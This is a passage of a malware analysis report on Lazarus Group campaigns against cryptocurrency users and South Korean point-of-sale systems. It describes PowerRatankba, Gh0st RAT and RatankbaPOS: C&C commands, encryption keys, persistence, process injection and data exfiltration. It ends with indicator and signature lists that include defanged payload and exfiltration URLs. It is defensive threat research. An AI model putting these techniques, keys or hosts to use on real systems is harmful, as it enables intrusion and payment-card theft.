bar.gif (see Attribution section for more commentary) while saving the downloaded script to C:\Users\Public\Documents\
Electrum_backup.vbs. The downloaded Electrum_backup.vbs was a PowerRatankba downloader with a target URL of
hxxp://trade.publicvm[.]com/images/character.gif, which ultimately delivered a PowerRatankba implant with a C&C of trade.
publicvm[.]com.
Implant Description and Analysis
Three key implants were used at various points in these campaigns. The implants -- PowerRatankba, Gh0st RAT, and
RatankbaPOS -- and specific variations are described in detail below.
PowerRatankba Description
PowerRatankba is used for the same purpose as Ratankba: as a first stage reconnaissance tool and for the deployment
of further stage implants on targets that are deemed interesting by the actor. Similar to its predecessor, PowerRatankba
utilizes HTTP for its C&C communication.
Once executed, PowerRatankba first sends detailed information about the infected device to its C&C server via the
BaseInfo HTTP POST (Fig. 30), including the computer name, IP address(es), OS boot time and installation date, language,
if ports 139, 3389, and/or 445 are open/closed/filtered, a process list, and (PowerRatankba.B only) output from two WMIC
commands (Fig. 31).
North Korea Bitten by Bitcoin Bug
Figure 30: Initial HTTP POST containing infected device information to PowerRatankba.A C&C
Figure 31: WMIC command output sent via same initial HTTP POST
There are only slight variations between the initial BaseInfo HTTP POST, such as the process list is retrieved by
PowerRatankba.A using
tasklist /svc
while PowerRatankba.B uses just
tasklist
PowerRatankba.A C&C Description
After the initial C&C check-in, PowerRatankba.A issues What HTTP GET requests (Fig. 32) to retrieve commands from the C&C
server. All PowerRatankba.A HTTP requests contain a randomly generated numeric UID passed in the u HTTP URI parameter.
Figure 32: PowerRatankba.A What HTTP GET Request
This variant receives commands and sends responses in plaintext. This variant only has four commands (Table 1) including
a sleep, exit, and two different execute code functions.
North Korea Bitten by Bitcoin Bug
Table 1: PowerRatankba.A C&C commands
Command
Description
success
Sleep and send request after sleep
killkill
Exit
Execute
Download payload from provided URL and execute via memory injection
DownExec
Download payload from provided URL, save to disk, then execute
PowerRatankba.B C&C Description
Similar to its predecessor, PowerRatankba.B issues What HTTP requests to its C&C server after the initial check-in. Instead
of a numeric UID, this variant uses the infected device
s double-Base64-encoded MAC address (Fig. 33).
Figure 33: PowerRatankba.B What HTTP GET Request
Commands from the C&C are still expected as plaintext but command parameters for all commands except interval are
encrypted with DES using
Casillas
as both the key and initialization vector (IV) and then Base64-encoded. The response
of the cmd command is the only data that is sent DES encrypted to the C&C whilst all other network traffic sent from the
infected device to the C&C is either plaintext or Base64-encoded.
Several new commands were added to this variant (Table 2) while Execute and DownExec were replaced. The command
exe was eventually changed to inj while functionality remained the same. Additionally, some earlier variants did not contain
all of the commands listed below but the overall capabilities of the backdoor remained largely the same, therefore for the
purpose of this research all variants with DES encryption are considered variant PowerRatankba.B.
Table 2: PowerRatankba.B C&C commands
Command
Description
success
Sleep and send request after sleep
killkill
Exit
interval
Change default sleep length
Execute command using
cmd.exe /c $cmdInst
. Command response is sent back to the
C&C DES encrypted and Base64 encoded
cf_sv
Replace SCH, VBS, PS1 files with provided server location and pre-determined URI (e.g.,
Download payload from provided URL, write to C:\Users\Public\Documents\000.exe, and
then execute payload.
exe or inj
Download payload from provided URL, inject into process memory using InvokeReflectivePEInjection
PowerRatankba Persistence
For persistence, PowerRatankba.A saves a JS file to the victim
s Startup folder as appView.js that will
be executed every time the victim
s user account logs in. The persistence JS (Fig. 34) contains a XOR
encoded PowerShell script to retrieve a Base64 encoded PowerShell from a hardcoded URL (e.g.,
hxxp://macintosh.linkpc[.]net:8080/mainls.cs ). The encoded PowerShell script used a XOR key of
ZWZBGMINRQLUSVTGHWVYANJHTVUHTLTUGKOHIYOXQEFEIPHNGACNKMBWGRTJIHRANIIZJNNZHVF
North Korea Bitten by Bitcoin Bug
Figure 34: appView.js persistence JS
PowerRatankba.B is capable of using two different persistence methods while only one will be used based on whether
or not the executing user has Administrator privileges. PowerRatankba first checks if the account has administrator
privileges by executing the following command:
whoami /groups | findstr /c:
S-1-5-32-544
| findstr /c:
Enabled group
&& goto:isadministrator
. If the user account does have administrator privileges then PowerRatankba will download a
PowerShell script from a hardcoded location (e.g.,
$BaseServer +
images/character.gif
), save it to a hardcoded location
(e.g., C:/Windows/System32/WindowsPowerShell/v1.0/Examples/detail.ps1), and finally create a scheduled task to execute
the downloaded PowerShell script on system startup. If the user account does not have administrator privileges then a
VBScript file is downloaded from a hardcoded location (e.g.,
$BaseServer +
images/top_bar.gif
) and saved to the
executing user
s Startup folder as, for example, PwdOpt.vbs or ProxyServer.vbs.
PowerRatankba.B Stage2 - Gh0st RAT
A Gh0st remote access Trojan/tool (RAT) was delivered via PowerRatankba.B to several devices running common
cryptocurrency-related applications. The Gh0st RAT samples were delivered via the memory injection exe/inj command (Fig.
35). After decrypting the command with DES the target URL was revealed to be hxxp://180.235.133[.]235/img.gif (Fig. 36).
Figure 35: Exe command delivered from PowerRatankba.B C&C to infected device
Figure 36 (left): PowerRatankba.B retrieving
Base64-encoded Gh0st dropper
The fake image was actually a Base64-encoded
custom encryptor with the embedded, encrypted
Gh0st RAT as the final payload. The encryptor
utilized AES in CBC-mode with the NIST
Special Publication 800-38A example key of
2B7E151628AED2A6ABF7158809CF4F3C
and IV of
000102030405060708090A0B0C0D0E0F
(Fig. 37).
North Korea Bitten by Bitcoin Bug
Figure 37: AES key and IV in custom encryptor downloaded by PowerRatankba.B
The decrypted Gh0st implant is a custom variant with magic bytes of RFC18 (Fig. 38). This variant was likely based on version
3.4.0.0 of Gh0st/PCRat, however we consider it likely that the author(s) have given their implants an internal version of 1.0.0.1
as can be observed in the decompressed initial check-in to the C&C (as well as hardcoded in the binaries) (Fig. 39).
Figure 38: Magic RFC18 value in unpacked Gh0st RAT sample
Figure 39: Version 1.0.0.1 RFC18 Gh0st RAT
Much of the 3.4.0.0 code remains the same, including the usage of Zlib compression and the infamous \x78\x9c default
Zlib compression header bytes (Fig. 40) observed in countless Gh0st RAT samples over the years.
Figure 40: Initial Gh0st check-in depicting RFC18 magic bytes and Zlib header
North Korea Bitten by Bitcoin Bug
Gh0st RAT Purpose
During our research we discovered that long-term sandboxing detonations of PowerRatankba not running cryptocurrencyrelated applications were never infected with a Stage2 implant. This may indicate that the PowerRatankba operator(s)
were only interested in infecting device owners with an obvious interest in various cryptocurrencies. In one case, a RFC18
Gh0st RAT was delivered to a PowerRatankba.B infected device within twenty minutes of the initial infection. From analyzing
C&C traffic logs we assess that a Lazarus operator almost immediately viewed the screen of the infected device and then
proceeded to take over full remote control, giving them the ability to interact with applications on the infected device,
including a password-protected Bitcoin wallet application.
Shopping Spree: Enter RatankbaPOS
Beyond stealing millions of US dollars worth of cryptocurrency, we have discovered a Lazarus operation to steal pointof-sale (POS) data primarily targeting POS terminals of businesses operating in South Korea. Considering the time of
year, most retail businesses around the world report their highest volume of sales between November and December so
naturally POS is a popular target for criminals. Enter RatankbaPOS, possibly the first publicly documented nation-state
sponsored campaign to steal POS data from a POS-related framework.1
At this time we have been unable to determine how RatankbaPOS is being delivered; however, based on its sharing of
C&C with PowerRatankba implants we hypothesize that Lazarus operators infiltrated at least one organization
s networks
utilizing PowerRatankba to deploy later stage implants (including the possibility of RFC18 Gh0ST RAT) to ultimately deploy
RatankbaPOS. Based on the fact that the file was hosted on the C&C in plaintext, and not Base64 encoded, we assess that
RatankbaPOS was more likely deployed with a later stage implant other than PowerRatankba.
RatankbaPOS Analysis
RatankbaPOS is deployed through a process injection dropper that is also capable of installing itself persistently, checking
a C&C for either an update or a command to delete itself, dropping the RatankbaPOS implant to disk, and finally searching
for the targeted POS process and module for injection and ultimately the theft of POS data.
The dropper first sets up persistence by creating a registry key in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\igfxgpttray. It uses its own module file name for the registry key value. Next, it makes an HTTP request
to a hardcoded URL hxxp://www[.]webkingston[.]com/update.jsp?action=need_update using a hardcoded User-Agent
(UA) of
Nimo Software HTTP Retriever 1.0
(Fig. 41) to request either instruction from the C&C to delete itself and remove
the persistence registry key or to download an updated implant with which to replace itself. If no response is returned from
the C&C, RatankbaPOS will begin the process injection search.
Figure 41: RatankbaPOS dropper requesting and receiving update from C&C
1 We acknowledge the excellent work from @ashley_shen_920, @051R15, and @kjkwak12 with their documentation of North Korean-related attacks on VANXATM
which was targeting ATM devices and not directly POS.
North Korea Bitten by Bitcoin Bug
The process injection search begins by taking a snapshot of the process list using CreateToolhelp32Snapshot. The implant
dropper/injector will then case-insensitive search for a process named xplatform.exe which we assess is likely associated
with Tobesoft
s XPLATFORM UI/UX design software. If a process name match is found then a TH32CS_SNAPMODULE
CreateToolhelp32Snapshot call is used to make a snapshot of xplatform.exe
s running module list. Loaded modules
are then iterated using Module32First and Module32Next while converting each result to lowercase by adding 0x20 to
any uppercase letters and then finally comparing the string to ksnetadsl.dll (Fig. 42) that we assess is associated with
a KSNET POS framework . Finally, the filesize of ksnetadsl.dll is checked to make sure it is 98,304 bytes (Fig. 42). If a
successful match is found then the process ID (PID) of xplatform.exe is returned. Lastly, RatankbaPOS will be written to
disk as c:\windows\temp\hkp.dll and the PID of xplatform.exe process will be used to inject hkp.dll into xplatform.exe using
LoadLibraryA and CreateRemoteThread (Fig. 43).
Figure 42: Dropper/injector searching for ksnetadsl.dll and correct filesize
North Korea Bitten by Bitcoin Bug
Figure 43: Injecting RatankbaPOS into xplatform.exe
RatankbaPOS will first hook the KSNETADSL.dll module at offset 0xB146 (Fig. 44). Interestingly there is code for
RatankbaPOS to check KSNETADSL.dll for an exported function named 1000B146, which seems like an unusual export
name for which to check, but this code will never be used because
!strcmp(
1000B146
1000B146
will always be true.
We hypothesize that this feature was included either by mistake or was previously used for debugging. RatankbaPOS will
also log messages to a file stored in c:\windows\temp\log.tmp.
Figure 44: RatankbaPOS
setting KSNETADSL.dll
injection offset
At this point in the reverse
engineering process, we
would naturally begin
reversing the KSNETADSL.
dll module; however, we
have only been able to find
two such modules with a
filesize of 98,304 bytes:
f2f6b4770718eed349fb7c77429938ac1deae7dd6bcc141ee6f5af9f4501a695
6c8c801bb71b2cd90a2c1595092358e46cbfe63e62ef6994345d6969993ea2d6
North Korea Bitten by Bitcoin Bug
After analyzing both KSNETADSL.dll modules, our preliminary assessment is that neither of the modules are the correct
target for RatankbaPOS. We can at least gain some insight into the purpose of KSNETADSL.dll, which appears to be the
handling of encrypted and decrypted credit card numbers for a KSNET-related POS framework system (Fig. 45). Further
analysis of RatankbaPOS focusing on the code used for C&C revealed the likely purpose of this implant
Figure 45: Screenshot showing KSNET module interaction with CARD_NO registry key
Only one HTTP POST request is programmed in RatankbaPOS for the communication to a C&C that is called via
CreateThread in the hook handler (DoC2, Fig. 46).
Figure 46: Hook handler creating new thread for C&C then hooking KSNETADSL.dll
Our analysis of the C&C communication revealed a number of clues as to what was being exfiltrated. Initially, the implant
uses strchr to find the first occurrence of
in the string data that is received from the hook of KSNETADSL.dll. Next,
37-bytes beginning at 16-bytes before the position of the
are copied to a buffer. Finally, that buffer is compared to a
substitution buffer that was created at the beginning of RatankbaPOS
execution (Fig. 47). The substitution algorithm uses
the values starting at offset 0x30-0x39 in the
-filled buffer to substitute the ASCII values of
for
ZCKOADBLNX
well as at offset 0x3D for substitution of ASCII
to
. Therefore, values
will be obfuscated to
ZCKOADBLNX
while
will be obfuscated to
(Fig. 48).
Figure 47: Obfuscation substitution buffer created in RatankbaPOS
North Korea Bitten by Bitcoin Bug
Figure 48: Obfuscation substitution buffer in memory
To obfuscate the data, RatankbaPOS simply uses the hex value of the cleartext ASCII string to substitute itself for a value
in the substitution buffer. For instance, a value of
would be substituted to
while any equals signs (
) will be
substituted for
. This method is used to likely obfuscate the data so it is harder to detect by simply glancing at network
traffic or through the use of heuristic-based detection of plaintext credit card data transmitted over the network. Once
the stolen data has been obfuscated, it is sent in a POST HTTP request to the URL /list.jsp?action=up using the same
hardcoded UA as the injector:
Nimo Software HTTP Retriever 1.0
(Fig. 49). So far we have observed the following C&C
domains: www.energydonate[.]com and online-help.serveftp[.]com.
Figure 49: DoC2 function that obfuscates stolen data and exfiltrates to a C&C
North Korea Bitten by Bitcoin Bug
Based on documentation we have found online,
RatankbaPOS is possibly targeting plaintext track data in
the first 16 bytes followed by a
and finally followed by
encrypted POS-related data beginning with
(Fig. 50).
According to the document, this is an encrypted form of
the track data. Based on this, there is the possibility that
this campaign may be targeting a SoftCamp POS-related
software application, framework, or device. If we are correct
and the values
always follow the
sign then one
could potentially find exfiltrated data in network traffic by
searching for the string
starting at offset 16 in the
client body of an HTTP POST request. However, more logic
will likely be necessary to reduce false positives but this
opens up several options for detection.
Figure 50: Documentation on South Korean POS
software depicting POS data that matches the pattern
RatankbaPOS is searching for (markings not ours)
RatankbaPOS Targeted Region
Based on the fact that RatankbaPOS is targeting a South Korean software vendor
s POS framework, including clues that
the length of exfiltrated data matches related POS data (document here, and another document here), we assess with high
confidence that this threat is primarily targeting devices in South Korea.
Attribution to Lazarus Group
Attribution is a controversial topic and arguably one of the most difficult tasks threat intelligence analysts face. However,
based on our research, we assess with a high level of confidence given the information available to us that the operations
and activity discussed in this research are attributed to Lazarus Group and ultimately North Korea.
In consideration of the controversial and difficult task at hand, we are providing an above and beyond summary of just
some of the key pieces and overlaps to validate our assessment. Key reasons, discussed in detail below, are Encryption,
Obfuscation, Functionality, Code Overlap, Decoys, and C&C.
Encryption
In October 2016 Lazarus Group pulled off a major operation that allegedly compromised at least 20 banks in Poland as
well as banks in other countries around the world. The attacks have been well documented by BAE, Kaspersky, ESET,
TrendMicro, and Symantec. The attribution of this attack to Lazarus (aka, Bluenoroff) and ultimately North Korea is widely
accepted across the industry. What has not been documented publicly, to our knowledge, are the specifics behind the
implementation of the Spritz encryption cipher utilized in some of the implants surrounding the banking incidents in late
2016 and early 2017.
Spritz is self-described as a spongy RC4-like stream cipher that was designed by Ronald Rivest and Jacob Schuldt.
Multiple implementations of Spritz exist on Github in languages like C and Python. Anyone researching Lazarus Group
version of Spritz will quickly find out that neither of the previously mentioned implementations will successfully decrypt
hidden payloads in either banking related implants nor PowerSpritz
s legitimate installer payload and malicious
PowerShell commands.
The issue, or possibly feature, in Lazarus Group
s implementation of Spritz can be found buried in a single paragraph on
page five of the original Spritz publication (Fig. 51). It states that addition and subtraction may be substituted for exclusiveor (XOR) and is referred to Spritz-xor.
North Korea Bitten by Bitcoin Bug
Figure 51: Excerpt from Spritz publication
Examining Lazarus Group
s implementation of Spritz in
one of the original implants utilized to compromise banks
in late 2016 and 2017 via watering hole attacks, it quickly
becomes apparent that they have actually implemented
Spritz-xor instead of the normal Spritz algorithm (Fig. 52).
Figure 52: Spritz-xor decrypt implementation in Lazarus Group
s implant from compromised banks
PowerSpritz utilizes the same exact Spritz-xor implementation as the older Lazarus Group-attributed implant (Fig. 53).
We assess that due to how rare Spritz usage is ITW, in addition to the implemented deviation from the standard, that it is
unlikely a different threat actor is also using this specific implementation.
Figure 53: Spritz-xor decrypt implementation in PowerSpritz
North Korea Bitten by Bitcoin Bug
Obfuscation
Earlier this year several watering hole attacks targeting South Korea utilized an ActiveX 0day exploit in M2Soft to deliver
Lazarus-connected FBI-RAT and Charon implants. Some of the techniques observed in these attacks overlap with the
JS downloader and CHM PowerRatankba campaigns. One such overlap was through the usage of a well-known JS
obfuscation technique in both the M2Soft exploit and PowerRatankba JS downloader campaigns. The method is a public
and widely used technique of masking strings using their hexadecimal values and placing them in an array assigned to a
variable with a naming structure of _0x[a-f0-9]{4} (Fig. 54).
Figure 54: ActiveX M2Soft exploit utilizing JS obfuscation also observed in a PowerRatankba campaign
Functionality
Several features in the original Ratankba implants are similar or identical when compared to PowerRatankba and
RatankbaPOS. Furthermore, the usage of a common directory c:\windows\temp\ for the storage of implants and logs are
seen across a wide array of Lazarus Group
s toolset. A brief overview of similar features is shown in below (Table 3) while a
detailed description of each overlap may be found below.
Table 3: Feature comparison table
Feature
Ratankba
PowerRatankba
RatankbaPOS
JSP C&C similarities
Commands:
success,killkill
Sleep 15 minutes loop
c:\windows\temp\
M2Soft Exploit
FEIB Spreader
First consider the C&C protocols utilized in all Ratankba, PowerRatankba, and RatankbaPOS. Ratankba
s initial POST to
C&C to divulge compromised system information uses the same BaseInfo parameter as PowerRatankba. Additionally, a
Ratankba sample (bd7332bfbb6fe50a501988c3834a160cf2ad948091d83ef4de31758b27b2fb7f) utilizes a C&C of list.jsp
while RatankbaPOS utilizes an identical URIfile name for allegedly exfiltrating credit card information to a C&C. Second,
Ratankba
s supported commands include success and killkill that function identically to the respective PowerRatankba
commands. Furthermore, a sleep loop of 900 seconds (15 minutes) is utilized in both Ratankba and RatankbaPOS
dropper (Fig. 56,56).
Figure 55: Ratankba command loop sleep
North Korea Bitten by Bitcoin Bug
Figure 56: RatankbaPOS dropper target process search loop
Lastly, while further analyzing the M2Soft exploit discussed in the Obfuscation section, a familiar destination directory of
C:\windows\temp\ was spotted in the deobfuscated JS (Fig. 57,58). This destination directory was also used during the
PowerRatankba CHM campaign, by RatankbaPOS for log and implant storage, and by the FEIB spreader.
Figure 57: Deobfuscated M2Soft exploit used to deliver Lazarus FBI-RAT implant
Figure 58: Deobfuscated M2Soft exploit used to deliver Lazarus Charon implant
Code Overlap
On or before October 3rd, 2017, the Far Eastern International Bank (FEIB) in Taiwan was
hacked by Lazarus Group to steal money via the SWIFT system. One of the implants
(9cc69d81613285352ce92ec3cb44227af5daa8ad4e483ecc59427fe23b122fce) utilized in that attack was a loader and
spreader that writes itself to the Windows temp directory: c:\windows\temp\. This directory is also used by numerous other
Lazarus Group implants including by the RatankbaPOS dropper for the payload drop location as well as for RatankbaPOS
logging. Additionally, there are several instances of code overlap between RatankbaPOS and the FEIB spreader implant.
One such overlap includes the way in which each implant sets up persistence in almost precisely the same way (Fig. 59).
Figure 59: Registry key persistence. Left: FEIB spreader, Right: RatankbaPOS dropper
North Korea Bitten by Bitcoin Bug
Decoys
Content found in a PowerRatankba JS downloader decoy (transaction.pdf downloaded by transaction.js) was previously
utilized in Lazarus campaigns using techniques that have more traditionally, to our knowledge, been used for espionage
rather than for financial gain. The campaign occurred on August 4th, 2017, where Lazarus Group impersonated a National
police officer of South Korea along with a malicious Microsoft Office Excel document. The malicious Excel attachment
utilized a macro-based VBScript XOR dropper technique that has been very well documented in public already.
The document used in this attack was named
.xls
(b46530fa2bd5f9958f664e754ae392dc400bd3fcb1c5adc7130b7374e0409924), which roughly translates to
Bitcoin
transaction history.
Using the macro-based VBScript XOR dropper technique a CoreDn downloader implant is dropped to
disk with a C&C of www.unsunozo[.]org. The interesting overlap with the PowerRatankba campaigns can be found in the
lure used by the Excel spreadsheet (Fig. 60). The highlighted transactions, after the
Final bitcoin Address
section match
with the beginning of the transactions used in the PowerRatankba decoy transaction.pdf.
Figure 60: Excel CoreDn ~tmp001.xls decoy on the left, PowerRatankba transaction.pdf decoy on the right
On a final note for this aspect of the actor attribution, campaigns utilizing the VBScript XOR macro technique have
historically been used for attacks more closely associated with espionage than for direct financial gain, as was the case
when several campaigns targeted the personal accounts of employees at US defense contractors. This behavior may offer
a clue as to the desperation North Korea has for procuring currency through illicit means, possibly due to the economic
sanctions imposed on the regime. This may indicate that there has been a significant shift in directives for the Lazarus
team(s) that historically conducted espionage campaigns. Furthermore, several of the campaigns utilizing the old VBScript
XOR macro technique have direct or within-one-week overlap with PowerRatankba campaigns alluding to the possibility
that there is in fact more than one team working under the North Korean umbrella as other companies have suggested
(e.g., Kaspersky
s excellent write-up on Bluenoroff).
A report was found in a Facebook post from mickeyfintech that listed a domain
utilized in several PowerRatankba campaigns as being associated with infrastructure
utilized in the breach of the FEIB (Fig. 61). The domain, trade.publicvm[.]com,
was allegedly connected to the FEIB hack. That domain was also used by several
PowerRatankba downloaders and payloads for hosting as well as C&C. This is a low
confidence indicator as we have been unable to corroborate if that domain was in
fact utilized by Lazarus in the hacking of the FEIB.
Figure 61: Facebook post listing PowerRatankba domain as being associated
with FEIB breach
North Korea Bitten by Bitcoin Bug
Conclusion
This report has introduced several new additions to Lazarus Group
s ever-growing arsenal, including a variety of different
attack vectors, a new PowerShell implant and Gh0st RAT variant, as well as an emerging point-of-sale threat targeting
South Korean devices. In addition to insight into Lazarus
emerging toolset, there are two key takeaways from this research:
Analyzing a financially motivated arm of a state actor highlights an often overlooked or underestimated aspect of statesponsored attacks; in this case, we were able to differentiate the actions of the financially motivated team within Lazarus
from those of their espionage and disruption teams that have recently grabbed headlines.
This group now appears to be targeting individuals rather than just organizations: individuals are softer targets, often
lacking resources and knowledge to defend themselves and providing new avenues of monetization for a statesponsored threat actor
s toolkit.
Moreover, both the explosive growth in cryptocurrency values and the emergence of new point-of-sale malware near the
peak holiday shopping season provide an interesting example of how one state-sponsored actor is following the money,
adding direct theft from individuals and organizations to the more
traditional
approach of targeting financial institutions
for espionage that we often observe with other APT actors.
Research Contributions
Proofpoint
Kafeine (@kafeine)
Matthew Mesa (@mesa_matt)
Kimberly (@StopMalvertisin)
James Emory (@sudosev)
External
Malc0de (@malc0de)
Adam (@infosecatom)
Jacob Soo (@_jsoo_)
Special Thanks
We would like to thank Yonathan Klijnsma (@ydklijnsma) and RisqIQ (@RiskIQ) for supporting
this research by sharing data and assisting with some of the infrastructure analysis.
North Korea Bitten by Bitcoin Bug
Indicators of Compromise (IOCs)
PowerSpritz ITW URLs
hxxp://skype.2[.]vu/1
hxxp://skype.2[.]vu/k
hxxp://skypeupdate.2[.]vu/1
hxxp://telegramupdate.2[.]vu/5
hxxps://doc-00-64-docs.googleusercontent[.]com/docs/securesc/
ha0ro937gcuc7l7deffksulhg5h7mbp1/39cbphg8k5qve4q5rr6nonee
1bueiu8o/1499428800000/13030420262846080952/*/0B63J1WTZC49h
X1JnZUo4Y1pnRG8?e=download
hxxps://drive.google[.]com/uc?export=download&id=0B63J1WTZC49hdDR0clR3cFpITVE
hxxp://201.211.183[.]215:8080/update.php?t=Skype&r=update
hxxp://122.248.34[.]23/lndex.php?t=SkypeSetup&r=mail_new
hxxp://122.248.34[.]23/lndex.php?t=Telegram&r=1.1.9
PowerSpritz Hashes
cbebafb2f4d77967ffb1a74aac09633b5af616046f31dddf899019ba78a55411
9ca3e56dcb2d1b92e88a0d09d8cab2207ee6d1f55bada744ef81e8b8cf155453
5a162898a38601e41d538f067eaf81d6a038268bc52a86cf13c2e43ca2487c07
PowerSpritz C&C
hxxp://dogecoin.deaftone[.]com:8080/mainls.cs
hxxp://macintosh[.]linkpc[.]net:8080/mainls.cs
Microsoft Compiled HTML Help (CHM) Hashes
81617bd4fa5d6c1a703c40157fbe16c55c11260723b7f63de022fd5dd241bdbf
d5f9a81df5061c69be9c0ed55fba7d796e1a8ebab7c609ae437c574bd7b30b48
4eb2dd5e90bda6da5efbd213c8472775bdd16e67bcf559f58802a8c371848212
01b047e0f3b49f8ab6ebf6795bc72ba7f63d7acbc68f65f1f8f66e34de827e49
I3e91f399d207178a5aa6de3d680b58fc3f239004e541a8bff2cc3e851b76e8bb
9d10911a7bbf26f58b5e39342540761885422b878617f864bfdb16195b7cd0f5
85a263fc34883fc514be48da2d814f1b43525e63049c6b180c73c8ec00920f51
6cb1e9850dd853880bbaf68ea23243bac9c430df576fa1e679d7f26d56785984
772b9b873100375c9696d87724f8efa2c8c1484853d40b52c6dc6f7759f5db01
6d4415a2cbedc960c7c7055626c61842b3a3ca4718e2ac0e3d2ac0c7ef41b84d
030b4525558f2c411f972d91b144870b388380b59372e1798926cc2958242863
Microsoft Compiled HTML Help (CHM) C&C
hxxp://92.222.106[.]229/theme.gif
hxxp://www.businesshop[.]net/hide.gif
MS Shortcut Link (LNK) Hashes
beecb33ef8adec99bbba3b64245c7230986c3c1a7f3246b0d26c641887387bfe
8f0b83d4ff6d8720e134b467b34728c2823c4d75313ef6dce717b06f414bdf5c
MS Shortcut Link (LNK) C&C
hxxp://tinyurl[.]com/y9jbk8cg
hxxp://201.211.183[.]215:8080/pdfviewer.php?o=0&t=report&m=0
JavaScript Hashes
e7581e1f112edc7e9fbb0383dd5780c4f2dd9923c4acc09b407f718ab6f7753d
7975c09dd436fededd38acee9769ad367bfe07c769770bd152f33a10ed36529e
100c6400331fa1919958bed122b88f1599a61b3bb113d98b218a535443ebc3a7
8ff100ca86cb62117f1290e71d5f9c0519661d6c955d9fcfb71f0bbdf75b51b3
97c6c69405ed721a64c158f18ab4386e3ade19841b0dea3dcce6b521faf3a660
41ee2947356b26e4d8aca826ae392be932cd8800476840713e9b6c630972604f
25f13dca780bafb0001d521ea6e76a3bd4dd74ce137596b948d41794ece59a66
JavaScript C&C
hxxp://51.255.219[.]82/files/download/falconcoin.zip
hxxp://51.255.219[.]82/theme.gif
hxxp://51.255.219[.].82/files/download/falconcoin.pdf
hxxp://apps.got-game[.]org/images/character.gif
North Korea Bitten by Bitcoin Bug
hxxp://apps.got-game[.]org/files/download/transaction.pdf
hxxp://www.energydonate[.]com/files/download/bithumb.zip
hxxp://www.energydonate[.]com/images/character.gif
hxxp://www.energydonate[.]com/files/download/bithumb.pdf
MS Office Docs Hashes
b3235a703026b2077ccfa20b3dabd82d65c6b5645f7f15e7bbad1ce8173c7960
b9cf1cba0f626668793b9624e55c76e2dab56893b21239523f2a2a0281844c6d
972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee
MS Office Docs C&C
198.100.157[.]239
hxxp://www.energydonate[.]com/files/download/Bithumb.zip
hxxp://www.energydonate[.]com/images/character.gif
PyInstaller Hashes
b530de08530d1ba19a94bc075e74e2236c106466dedc92be3abdee9908e8cf7e
eab612e333baaec0709f3f213f73388607e495d8af9a2851f352481e996283f1
eb372423e4dcd4665cc03ffc384ff625ae4afd13f6d0589e4568354be271f86e
PyInstaller Hosting or Email IDNA
xn--bitcin-zxa[.]org
xn--electrm-s2a[.]org
xn--bitcingold-hcb[.]org
xn--bitcoigold-o1b[.]com
xn--bitcoingld-lcb[.]com
xn--bitcoingld-lcb[.]org
xn--bitcoingod-8yb[.]com
xn--btcongold-54ad[.]com
xn--btcongold-g5ad[.]com
Likely Related IDNA
xn--6fgp[.]com
xn--bitcingold-5bb.[]com
xn--bitcingold-jbb[.]com
xn--bitcingold-t3b[.]com
xn--bitcoingol-4kb[.]com
xn--bitoingold-1ib[.]com
xn--btcoingold-v8a[.]com
xn--bitcoingldwallet-twb[.]org
PyInstaller C&C
hxxp://www.btc-gold[.]us/images/top_bar.gif
hxxp://trade.publicvm[.]com/images/top_bar.gif
PowerRatankba Hashes
41f155f039448edb42c3a566e7b8e150829b97d83109c0c394d199cdcfd20f9b
20f7e342a5f3224cab8f0439e2ba02bb051cd3e1afcd603142a60ac8af9699ba
db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471
3cd0689b2bae5109caedeb2cf9dd4b3a975ab277fadbbb26065e489565470a5c
b265a5d984c4654ac0b25ddcf8048d0aabc28e36d3e2439d1c08468842857f46
1768f2e9cea5f8c97007c6f822531c1c9043c151187c54ebfb289980ff63d666
99ad06cca4910c62e8d6b68801c6122137cf8458083bb58cbc767eebc220180d
f7f2dd674532056c0d67ef1fb7c8ae8dd0484768604b551ee9b6c4405008fe6b
d844777dcafcde8622b9472b6cd442c50c3747579868a53a505ef2f5a4f0e26a
NOTE: Several of these domains reflect themes and brands (only BTG) that are confirmed to have been used in phishing attacks. Additionally, they were
registered in the same timeframe, at the same registrar, with matching server characteristics that were observed in the confirmed IDNA infrastructure domains.
These domains in no way indicate that they have been used for attacks, nor that the themes utilized indicate that the entity in question has been targeted or
compromised. We simply assess that this infrastructure is related to Lazarus Group and currently do not know how or if it was utilized for campaigns.
North Korea Bitten by Bitcoin Bug
PowerRatankba C&C
51.255.219[.]82
144.217.51[.]246
158.69.57[.]135
198.100.157[.]239
201.139.226[.]67
92.222.106[.]229
apps.got-game[.]org
trade.publicvm[.]com
www.businesshop[.]net
vietcasino.linkpc[.]net
Related Unknown Purpose C&C
coinbases[.]org
africawebcast[.]com
bitforex.linkpc[.]net
macintosh.linkpc[.]net
coinbroker.linkpc[.]net
moneymaker.publicvm[.]com
RFC18 Gh0st RAT
3a856d8c835232fe81711680dc098ed2b21a4feda7761ed39405d453b4e949f6
RFC18 Gh0st RAT Download Locations
hxxp://180.235.133[.]235/img.gif
hxxp://180.235.133[.]121/images/img.gif
RFC18 Gh0st RAT C&C
180.235.133[.]235:443
180.235.133[.]121:443
51.255.219[.]82:443
158.69.57[.]135:443
RatankbaPOS ITW
hxxp://www.webkingston[.]com/top.gif
RatankbaPOS Hashes
b66624ab8591c2b10730b7138cbf44703abec62bfc7774d626191468869bf21c
79a4b6329e35e23c3974960b2cecc68ee30ce803619158ef3fefcec5d4671c98
d334c40b42d2e6286f0553ae9e6e73e7e7aaec04a85df070b790738d66fd14fb
2b05a692518a6102c540e209cb4eb1391b28944fdb270aef7ea47e1ddeff5ae2
RatankbaPOS Loader C&C
hxxp://www.webkingston[.]com/update.jsp?action=need_update
RatankbaPOS Exfiltration C&C
hxxp://www.energydonate[.]com/list.jsp?action=up
hxxp://online-help[.]serveftp[.]com/list.jsp?action=up
North Korea Bitten by Bitcoin Bug
ET and ETPRO Suricata/Snort Signatures
2824864,ETPRO TROJAN Ratankba Recon Backdoor/Module CnC Beacon 1
2828904,ETPRO TROJAN RatankbaPOS Dropper CnC Checkin M1
2828905,ETPRO TROJAN RatankbaPOS Dropper CnC Checkin M2
2828906,ETPRO TROJAN RatankbaPOS CnC Checkin
2828921,ETPRO TROJAN PowerRatankba DNS Lookup 1
2828922,ETPRO TROJAN PowerRatankba DNS Lookup 2
2828923,ETPRO TROJAN PowerRatankba DNS Lookup 3
2828924,ETPRO TROJAN PowerRatankba DNS Lookup 4
2828925,ETPRO TROJAN PowerRatankba DNS Lookup 5
2828926,ETPRO TROJAN PowerRatankba DNS Lookup 6
